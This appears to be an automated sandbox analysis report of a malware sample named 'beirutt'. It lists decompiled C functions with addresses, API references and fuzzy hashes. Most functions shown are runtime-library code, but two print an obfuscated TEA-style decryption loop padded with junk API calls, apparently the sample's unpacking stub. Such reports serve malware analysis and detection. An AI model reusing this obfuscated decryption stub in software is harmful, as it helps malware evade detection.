			E0040E6F7(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x40f6e0);
				E004051A4(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E0040E273(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00405771(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00405771(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E00405771(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00405771(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0040E318(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040E81D(_t48, _t53, _t55, _t57, _t61);
				return E004051E9( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0040e6f7
0x0040e6f7
0x0040e6f9
0x0040e6fe
0x0040e703
0x0040e705
0x0040e708
0x0040e70b
0x0040e70e
0x0040e715
0x0040e726
0x0040e734
0x0040e742
0x0040e74a
0x0040e758
0x0040e75e
0x0040e765
0x0040e768
0x0040e77e
0x0040e781
0x0040e7f6
0x0040e7fd
0x0040e804
0x0040e811

APIs

__CreateFrameInfo.LIBCMT ref: 0040E71F

Part of subcall function 0040E273: __getptd.LIBCMT ref: 0040E281
Part of subcall function 0040E273: __getptd.LIBCMT ref: 0040E28F

__getptd.LIBCMT ref: 0040E729

Part of subcall function 00405771: __getptd_noexit.LIBCMT ref: 00405774
Part of subcall function 00405771: __amsg_exit.LIBCMT ref: 00405781

__getptd.LIBCMT ref: 0040E737
__getptd.LIBCMT ref: 0040E745
__getptd.LIBCMT ref: 0040E750
_CallCatchBlock2.LIBCMT ref: 0040E776

Part of subcall function 0040E318: __CallSettingFrame@12.LIBCMT ref: 0040E364

Part of subcall function 0040E81D: __getptd.LIBCMT ref: 0040E82C
Part of subcall function 0040E81D: __getptd.LIBCMT ref: 0040E83A

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 4c646f0a799780aa0321a444552135d914b06bbf9c466d947851ab0d53004f45
Instruction ID: 2fba35f36806ff58bb28d6fcf2610a037f5d47c4bd499cbdd60a1f319799d425
Opcode Fuzzy Hash: 4c646f0a799780aa0321a444552135d914b06bbf9c466d947851ab0d53004f45
Instruction Fuzzy Hash: FF11B4B5C00209DFDF00EFA6D545AAE7BB0FF04314F10846AF814AB2A1DB799A159F58

Uniqueness

Uniqueness Score: -1.00%

Function 00403150 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00403150() {
				char _v8;
				struct _DCB _v36;
				char _v1060;
				char _v2084;
				void* __esi;
				unsigned int _t6;
				unsigned int _t15;
				intOrPtr _t17;
				intOrPtr _t22;

				_t17 =  *0x429e3c;
				_t6 =  *0x42a074 >> 3;
				if(_t6 > 0) {
					_t22 = _t17;
					_t15 = _t6;
					do {
						_t27 =  *0x42a074 - 0x959;
						if( *0x42a074 == 0x959) {
							BuildCommDCBA(0,  &_v36);
							__imp__DnsHostnameToComputerNameA(0,  &_v1060,  &_v8);
							LCMapStringA(0, 0, 0, 0,  &_v2084, 0);
							IsBadStringPtrA("Pinuzibunahe zukoji", 0);
						}
						_t6 = E00402FD8(_t22, _t27);
						_t22 = _t22 + 8;
						_t15 = _t15 - 1;
					} while (_t15 != 0);
				}
				return _t6;
			}

0x00403158
0x00403165
0x0040316c
0x00403170
0x00403172
0x00403174
0x00403174
0x0040317e
0x00403185
0x00403197
0x004031a9
0x004031b5
0x004031b5
0x004031bb
0x004031c0
0x004031c3
0x004031c3
0x004031c7
0x004031ca

APIs

BuildCommDCBA.KERNEL32 ref: 00403185
DnsHostnameToComputerNameA.KERNEL32 ref: 00403197
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004031A9
IsBadStringPtrA.KERNEL32 ref: 004031B5

Strings

Pinuzibunahe zukoji, xrefs: 004031B0

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: String$BuildCommComputerHostnameName
String ID: Pinuzibunahe zukoji
API String ID: 3159751871-2386280476
Opcode ID: 1531280097a87e51bc88ed3ab2086b04ed19e0a85f46696b11ae0fca773cfb85
Instruction ID: 42d317f9455319fa05990adeb67f1112abb76fad5f408e55a6ca7c8e4e39ae8b
Opcode Fuzzy Hash: 1531280097a87e51bc88ed3ab2086b04ed19e0a85f46696b11ae0fca773cfb85
Instruction Fuzzy Hash: 17018672500018ABD720AB95EE88DBF77BCE78D745B44017AFA05E2190DA785945CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E446 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E0040E446(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				intOrPtr* _t15;
				intOrPtr* _t18;
				void* _t22;

				_t25 = __esi;
				_t24 = __edi;
				_t23 = __edx;
				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00405771(_t22, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00405771(_t22, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L9;
				} else {
					__eflags = __eax - 0xe06d7363;
					if(__eflags != 0) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						 *(E00405771(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
						_push(8);
						_push(0x40f4b8);
						E004051A4(_t22, __edi, __esi);
						_t18 =  *((intOrPtr*)(E00405771(_t22, __edx, _t30) + 0x78));
						if(_t18 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t18();
							_v8 = 0xfffffffe;
						}
						return E004051E9(E0040A6C7(_t22, _t23, _t24, _t25));
					}
				}
			}

0x0040e446
0x0040e446
0x0040e446
0x0040e452
0x0040e457
0x0040e476
0x0040e47d
0x0040e484
0x0040e489
0x0040e489
0x0040e489
0x00000000
0x0040e459
0x0040e459
0x0040e45e
0x0040e48b
0x0040e48b
0x0040e48e
0x0040e460
0x0040e465
0x0040751d
0x0040751f
0x00407524
0x0040752e
0x00407533
0x00407535
0x00407539
0x00407544
0x00407544
0x00407555
0x00407555
0x0040e45e

APIs

__getptd.LIBCMT ref: 0040E460

Part of subcall function 00405771: __getptd_noexit.LIBCMT ref: 00405774
Part of subcall function 00405771: __amsg_exit.LIBCMT ref: 00405781

__getptd.LIBCMT ref: 0040E471
__getptd.LIBCMT ref: 0040E47F

Strings

MOC, xrefs: 0040E452
csm, xrefs: 0040E459

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 23be72e0ce07f3dd4909ca620f322336a2b0cc27d887f9b8fec9bff8525fb478
Instruction ID: 0e0f1c1620b3eba741980b849ef1dbd11c48179fda8e1047b9716f30dd484108
Opcode Fuzzy Hash: 23be72e0ce07f3dd4909ca620f322336a2b0cc27d887f9b8fec9bff8525fb478
Instruction Fuzzy Hash: AFE04F39500208DFC710EBA6D046F6A37A4FB45318FA605B7E40CD73A2D73CE850AA8A

Uniqueness

Uniqueness Score: -1.00%

Function 00408AC2 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00408AC2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x40f578);
				E004051A4(__ebx, __edi, __esi);
				_t31 = E00405771(__ebx, __edx, _t35);
				_t15 =  *0x411b44; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004046AA(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x411a48; // 0x2432b38
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x411620;
								if(_t33 != 0x411620) {
									_push(_t33);
									E00403BAD();
								}
							}
						}
						_t21 =  *0x411a48; // 0x2432b38
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x411a48; // 0x2432b38
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00408B5D();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00403FF1(0x20);
				}
				return E004051E9(_t33);
			}

0x00408ac2
0x00408ac2
0x00408ac2
0x00408ac2
0x00408ac4
0x00408ac9
0x00408ad3
0x00408ad5
0x00408add
0x00408afe
0x00408b04
0x00408b08
0x00408b0b
0x00408b0e
0x00408b14
0x00408b16
0x00408b18
0x00408b1b
0x00408b21
0x00408b23
0x00408b25
0x00408b2b
0x00408b2d
0x00408b2e
0x00408b33
0x00408b2b
0x00408b23
0x00408b34
0x00408b39
0x00408b3c
0x00408b42
0x00408b46
0x00408b46
0x00408b4c
0x00408b53
0x00408ae5
0x00408ae5
0x00408ae5
0x00408aea
0x00408aee
0x00408af3
0x00408afb

APIs

__getptd.LIBCMT ref: 00408ACE

Part of subcall function 00405771: __getptd_noexit.LIBCMT ref: 00405774
Part of subcall function 00405771: __amsg_exit.LIBCMT ref: 00405781

__amsg_exit.LIBCMT ref: 00408AEE
__lock.LIBCMT ref: 00408AFE
InterlockedDecrement.KERNEL32(?), ref: 00408B1B
InterlockedIncrement.KERNEL32(02432B38), ref: 00408B46

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 66dd2fa753a1a685f9c11b3054dff8d1f0830b756067589b6943da229e1ce8cd
Instruction ID: d53a08de569f5ea7140f03b2975a75d5394f6e1a4503d4bec7f9cd32b5ec8c7e
Opcode Fuzzy Hash: 66dd2fa753a1a685f9c11b3054dff8d1f0830b756067589b6943da229e1ce8cd
Instruction Fuzzy Hash: 6E018E71A02A119BD720AFA69506B9A7760AF00764F14403FF84077AE2CF3C6941DF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BAD Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E00403BAD() {
				intOrPtr* _t10;
				intOrPtr _t13;
				void* _t15;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x40f340);
				_t8 = E004051A4(_t15, _t22, _t23);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E004051E9(_t8);
				}
				if( *0x42a204 != 3) {
					_push(_t24);
					L7:
					if(HeapFree( *0x427f60, 0, ??) == 0) {
						_t10 = E004044EB();
						 *_t10 = E004044A9(GetLastError());
					}
					goto L9;
				}
				E004046AA(_t15, _t21, _t22, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E004046DD(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E0040470D();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00403C03();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x00403bad
0x00403baf
0x00403bb4
0x00403bb9
0x00403bbe
0x00403c35
0x00403c3a
0x00403c3a
0x00403bc7
0x00403c0c
0x00403c0d
0x00403c1d
0x00403c1f
0x00403c32
0x00403c34
0x00000000
0x00403c1d
0x00403bcb
0x00403bd1
0x00403bd6
0x00403bdc
0x00403be1
0x00403be3
0x00403be4
0x00403be5
0x00403beb
0x00403bec
0x00403bf3
0x00403bfc
0x00000000
0x00403bfe
0x00403bfe
0x00000000
0x00403bfe

APIs

__lock.LIBCMT ref: 00403BCB

Part of subcall function 004046AA: __mtinitlocknum.LIBCMT ref: 004046C0
Part of subcall function 004046AA: __amsg_exit.LIBCMT ref: 004046CC
Part of subcall function 004046AA: EnterCriticalSection.KERNEL32(?,?,?,0040540D,00000004,0040F3E8,0000000C,00405AA2,?,?,00000000,00000000,00000000,?,00405723,00000001), ref: 004046D4

___sbh_find_block.LIBCMT ref: 00403BD6
___sbh_free_block.LIBCMT ref: 00403BE5
HeapFree.KERNEL32(00000000,?,0040F340,0000000C,0040468B,00000000,0040F3C8,0000000C,004046C5,?,?,?,0040540D,00000004,0040F3E8,0000000C), ref: 00403C15
GetLastError.KERNEL32(?,0040540D,00000004,0040F3E8,0000000C,00405AA2,?,?,00000000,00000000,00000000,?,00405723,00000001,00000214), ref: 00403C26

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b7e74050a7b4e424632581769c1617b7047822b1662ff9d6ce5f5c11e8995a59
Instruction ID: bc6242c41814cbd2cdadc70d69a252db936781d24023b165fed790dc96fa4c3d
Opcode Fuzzy Hash: b7e74050a7b4e424632581769c1617b7047822b1662ff9d6ce5f5c11e8995a59
Instruction Fuzzy Hash: C401A272909245EAEB307FB29D0AB4F3E68AF41329F10413FF511BA1D1DA3C96418A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402FD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402FD8(unsigned int* __esi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				char _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				unsigned int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t83;
				unsigned int _t106;
				unsigned int _t115;
				unsigned int* _t116;

				_t116 = __esi;
				_v20 =  *__esi;
				_t74 =  *0x412088; // 0x8ef5cd96
				_v52 = _t74;
				_t75 =  *0x41208c; // 0xd914255
				_t115 = __esi[1];
				_v60 = _t75;
				_v16 = 0;
				_v64 = 0x9e3779b9;
				E00402FCB( &_v16);
				_t78 =  *0x412090; // 0x1be4afa6
				_v16 = _v16 + 0x23f;
				_v44 = _t78;
				_t79 =  *0x412094; // 0xe166ab65
				_v48 = _t79;
				_v40 = 0x20;
				do {
					_v24 = 2;
					_v24 = _v24 + 3;
					_v12 = (_v20 << 4) + _v44;
					_t83 =  *0x42a074;
					if(_t83 == 0xfa9) {
						 *0x429ed4 = 0xedeb2e40;
					}
					if(_t83 == 0x3eb) {
						InterlockedIncrement(0);
						 *0x429e38 = 0;
					}
					_v36 = _v20;
					_v36 = _v36 + _v16;
					_v8 = _v20 >> 5;
					 *0x429ed0 = 0xf4ea3dee;
					E00402FD2( &_v8, _v48);
					_v12 = _v12 ^ _v36;
					if( *0x42a074 == 0x9e6) {
						GetCommMask(0, 0);
					}
					_v8 = _v8 ^ _v12;
					if( *0x42a074 == 0x213) {
						OpenWaitableTimerW(0, 0, 0);
					}
					_t115 = _t115 - _v8;
					_v32 = 2;
					_v56 = _t115;
					_v32 = _v32 - 0x5396dd36;
					_v32 = _v32 + 0x5396dd38;
					_v28 = 0;
					_v12 = (_t115 << _v32) + _v52;
					_v28 = _v28 + _v16;
					_v28 = _v28 + _v56;
					_v36 = _v28;
					_v8 = _t115 >> _v24;
					E00402FD5( &_v8, _v60);
					_v12 = _v12 ^ _v36;
					_v12 = _v12 ^ _v8;
					 *0x428ab4 = 0;
					_v20 = _v20 - _v12;
					_v16 = _v16 - _v64;
					_t69 =  &_v40;
					 *_t69 = _v40 - 1;
				} while ( *_t69 != 0);
				_t106 = _v20;
				_t116[1] = _t115;
				 *_t116 = _t106;
				return _t106;
			}

0x00402fd8
0x00402fe0
0x00402fe3
0x00402fe8
0x00402feb
0x00402ff2
0x00402ff7
0x00402ffd
0x00403000
0x00403007
0x0040300c
0x00403011
0x00403018
0x0040301b
0x00403020
0x00403023
0x0040302a
0x0040302a
0x00403031
0x0040303e
0x00403041
0x0040304b
0x0040304d
0x0040304d
0x0040305c
0x0040305f
0x00403065
0x00403065
0x0040306e
0x00403074
0x0040307d
0x00403086
0x00403090
0x00403098
0x004030a5
0x004030a9
0x004030a9
0x004030b2
0x004030bf
0x004030c4
0x004030c4
0x004030ca
0x004030cd
0x004030d4
0x004030d7
0x004030de
0x004030ec
0x004030f2
0x004030f8
0x004030ff
0x00403105
0x00403112
0x00403118
0x00403120
0x00403126
0x00403129
0x00403132
0x00403138
0x0040313b
0x0040313b
0x0040313b
0x00403144
0x00403147
0x0040314b
0x0040314f

APIs

InterlockedIncrement.KERNEL32(00000000), ref: 0040305F
GetCommMask.KERNEL32(00000000,00000000), ref: 004030A9
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004030C4

Strings

, xrefs: 00403023

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: CommIncrementInterlockedMaskOpenTimerWaitable
String ID:
API String ID: 36405069-3916222277
Opcode ID: 0f113831bd455ac7c35b2cbed84266e0ae648357fc525ef886dc46040b423137
Instruction ID: 30024ad36cf51a362b049fd153f17e0c0c61e1b83e4288bc1f6b39f1eac0fe5d
Opcode Fuzzy Hash: 0f113831bd455ac7c35b2cbed84266e0ae648357fc525ef886dc46040b423137
Instruction Fuzzy Hash: 1C51ACB4E01209DFCB10DFA9DA85A9EBBF4FB18314F50816AE415F3250D778AA41CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 26%

			E0040EAA4(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040EA12(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0040DFCB(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0040E48F(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0040E6F7(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
				if(_t20 != 0) {
					E0040DF84(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0040eaa4
0x0040eaa4
0x0040eaa4
0x0040eaa4
0x0040eaa9
0x0040eaad
0x0040eaaf
0x0040eab2
0x0040eab3
0x0040eab4
0x0040eab7
0x0040eabc
0x0040eabc
0x0040eabf
0x0040eac3
0x0040eac6
0x0040eacb
0x0040eac8
0x0040eac8
0x0040eac8
0x0040eace
0x0040ead3
0x0040ead5
0x0040ead8
0x0040eadb
0x0040eadc
0x0040eae4
0x0040eae9
0x0040eaed
0x0040eaf0
0x0040eaf3
0x0040eaf9
0x0040eafa
0x0040eafd
0x0040eb07
0x0040eb0b
0x00000000
0x0040eb0b
0x0040eb11

APIs

___BuildCatchObject.LIBCMT ref: 0040EAB7

Part of subcall function 0040EA12: ___BuildCatchObjectHelper.LIBCMT ref: 0040EA48

_UnwindNestedFrames.LIBCMT ref: 0040EACE
___FrameUnwindToState.LIBCMT ref: 0040EADC

Strings

csm, xrefs: 0040EAB3, 0040EAC8, 0040EADB, 0040EAF9, 0040EB09

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 56a0972f6a587b333e2e833752cbed26613266ea5e22a264abdd7f0a6e9ef6e4
Instruction ID: 08b8f2d3db30b0cd70fd646e66df0b5cd17a4922e736f5bad4783512040116fa
Opcode Fuzzy Hash: 56a0972f6a587b333e2e833752cbed26613266ea5e22a264abdd7f0a6e9ef6e4
Instruction Fuzzy Hash: 1F014F31100109BBCF12AF52CD45EAB3F6AFF48354F048826FD08241A1D73AD871EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040A2B9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x401b00;
					_v28 =  *0x401af8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0040a2be
0x0040a2c6
0x0040a2dd
0x0040a289
0x0040a292
0x0040a29e
0x0040a2a1
0x0040a2a4
0x0040a2a6
0x0040a2a9
0x0040a2ae
0x0040a2b8
0x0040a2b0
0x0040a2b4
0x0040a2b4
0x0040a2c8
0x0040a2ce
0x0040a2d6
0x00000000
0x0040a2d8
0x0040a2d8
0x0040a2dc
0x0040a2dc
0x0040a2d6

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040715C), ref: 0040A2BE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040A2CE

Strings

IsProcessorFeaturePresent, xrefs: 0040A2C8
KERNEL32, xrefs: 0040A2B9

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

